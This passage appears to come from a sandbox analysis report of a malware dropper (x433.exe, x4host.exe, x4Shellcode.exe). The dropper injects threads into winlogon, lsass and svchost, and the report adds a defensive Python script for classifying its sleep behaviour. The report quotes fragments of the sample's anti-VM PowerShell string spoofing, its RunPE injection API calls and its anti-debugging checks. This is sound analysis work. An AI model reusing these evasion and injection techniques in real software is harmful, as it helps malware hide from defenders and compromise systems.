Source: Microsoft-Windows-Partition%4Diagnostic.evtx.16.dr Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: lsass.exe, 00000007.00000002.2960383043.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744038298.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000000.1747028955.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2954846604.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.1781345340.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2948010267.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2949153556.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1782563333.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1786857019.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2962792700.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1798422088.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: lsass.exe, 00000007.00000003.2270451721.00000202C037F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.16.dr Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000021.00000000.1866482937.000002644A62B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000002.2956365705.000001D558643000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000008.00000000.1747138035.000002A66065D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000017.00000000.1828228212.0000023FD3802000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000007.00000002.2966297830.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: Microsoft-Windows-PowerShell%4Operational.evtx.16.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000009.00000002.3038914037.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
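
The sleep signatures above lump two different behaviours together. The count-less "Thread sleep time" figures are each an exact multiple of 922337203685477, which is (2^63 - 1) // 10^4, the largest 64-bit delay the sandbox can report, so those threads are parked on maximal (effectively infinite) waits and the multiple tells you how many such calls were made: x4host.exe TID 6620 made 26 of them and powershell.exe TID 3444 made 7. The lines that carry both a count and a time are polling loops, and time divided by count gives the per-call interval: 100 for dllhost.exe TID 6992, 1000 for every injected system-process thread. The following is an added example, not code from the report, the sandbox or the sample: a Python triage script that parses these lines, sums repeated entries for the same thread (winlogon.exe TID 6524 appears twice), and classifies each thread. It ignores the report's unit label and relies only on ratios and multiples, which is an assumption about how the figures are accumulated; the sample lines are copied from the report above.

```python
import re
from collections import defaultdict

# (2**63 - 1) // 10**4 == 922337203685477: the largest 64-bit delay the sandbox can
# report, i.e. an effectively infinite wait. Count-less "Thread sleep time" lines are
# exact multiples of it (assumption: the reported figure is a per-thread sum).
MAX_DELAY = (2**63 - 1) // 10**4

SLEEP_RE = re.compile(
    r"^Source: (?P<image>\S+) TID: (?P<tid>\d+) Thread sleep "
    r"(?P<kind>count|time): -?(?P<value>\d+)s? >=? -?\d+s?$"
)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_sleeps(text):
    """Accumulate sleep count and total delay per (image, TID). Repeated lines for
    the same thread are summed, which keeps the time/count ratio intact."""
    threads = defaultdict(lambda: {"count": 0, "time": 0})
    for line in text.splitlines():
        m = SLEEP_RE.match(line.strip())
        if m:
            threads[(m["image"], int(m["tid"]))][m["kind"]] += int(m["value"])
    return dict(threads)


def classify(entry):
    """A delay that is a multiple of MAX_DELAY is an infinite wait and the multiple is
    the number of such calls; otherwise time/count is the interval of a polling loop."""
    count, time = entry["count"], entry["time"]
    if time and time % MAX_DELAY == 0:
        return {"technique": "infinite-wait", "calls": time // MAX_DELAY, "interval": None}
    if count and time:
        return {"technique": "polling-loop", "calls": count, "interval": time // count}
    if count:
        return {"technique": "polling-loop", "calls": count, "interval": None}
    return {"technique": "unclassified", "calls": None, "interval": None}


def summarize(text):
    """Map 'image basename:TID' to its classification."""
    return {
        f"{basename(image)}:{tid}": classify(entry)
        for (image, tid), entry in parse_sleeps(text).items()
    }


# Constructed sample: lines copied verbatim from the report above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\x433.exe TID: 6616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x4host.exe TID: 6620 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3444 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep count: 470 > 30
Source: C:\Windows\System32\dllhost.exe TID: 6992 Thread sleep time: -47000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 7592 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -7592000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep count: 2408 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6524 Thread sleep time: -2408000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep count: 250 > 30
Source: C:\Windows\System32\svchost.exe TID: 6808 Thread sleep time: -250000s >= -30000s
"""

if __name__ == "__main__":
    for key, info in summarize(SAMPLE).items():
        print(f"{key:<22} {info['technique']:<14} calls={info['calls']} interval={info['interval']}")
```

Run against the full section, the split is stark: the dropper, x4host.exe, x4usb.exe and the two PowerShell instances park threads on maximal waits, while every thread dllhost.exe planted in winlogon.exe, lsass.exe, dwm.exe and the svchost.exe instances ticks at the same 1000-unit interval, which is the signature of one injected payload running one polling loop per victim.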

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 2_2_00007FFD9B887801 CheckRemoteDebuggerPresent, 2_2_00007FFD9B887801
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_007A1361
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00470594 mov eax, dword ptr fs:[00000030h] 1_2_00470594
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00761130 mov eax, dword ptr fs:[00000030h] 1_2_00761130
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A3F3D mov eax, dword ptr fs:[00000030h] 1_2_007A3F3D
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00401868 GetProcessHeap,HeapAlloc,StrCpyW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW, 1_2_00401868
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_007A1361
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_007A4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_007A4C7B
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000002D8B0A684D4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000002D8B0A6DBF4
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A68170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000002D8B0A68170
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000225DC64DBF4
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC6484D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00000225DC6484D4
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC648170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00000225DC648170
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000202C0AEDBF4
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000202C0AE8170
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AE84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00000202C0AE84D4
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A661308170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000002A661308170
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_000002A66130DBF4
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A6613084D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000002A6613084D4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26DBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002BAAE26DBF4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE2684D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_000002BAAE2684D4
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE268170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002BAAE268170
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_0000026A879C84D4
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CDBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0000026A879CDBF4
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879C8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0000026A879C8170
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A8170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000179537A8170
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537A84D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00000179537A84D4
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537ADBF4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00000179537ADBF4
Source: C:\Users\user\Desktop\x433.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 1.0.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 3.2.powershell.exe.21ffc670000.15.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 1.2.x4Shellcode.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 5_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AE232A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B392A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3F72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C0262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C9F32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 644B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4F62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F5352A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: F0D62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: FFB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C2572A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BCE2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7DB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 78742A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60DA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4262A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 94D52A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F36C2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6B72A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 801F2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 71E62A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3ED21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B9BA2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E3382A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6DDB2A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6972A8C Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10121C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2DF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FE21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2C221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 24A21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8521C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F321C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14621C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2D921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E421C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 26021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 30221C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E921C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25F21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8021C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB21C3 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2C321C3 Jump to behavior
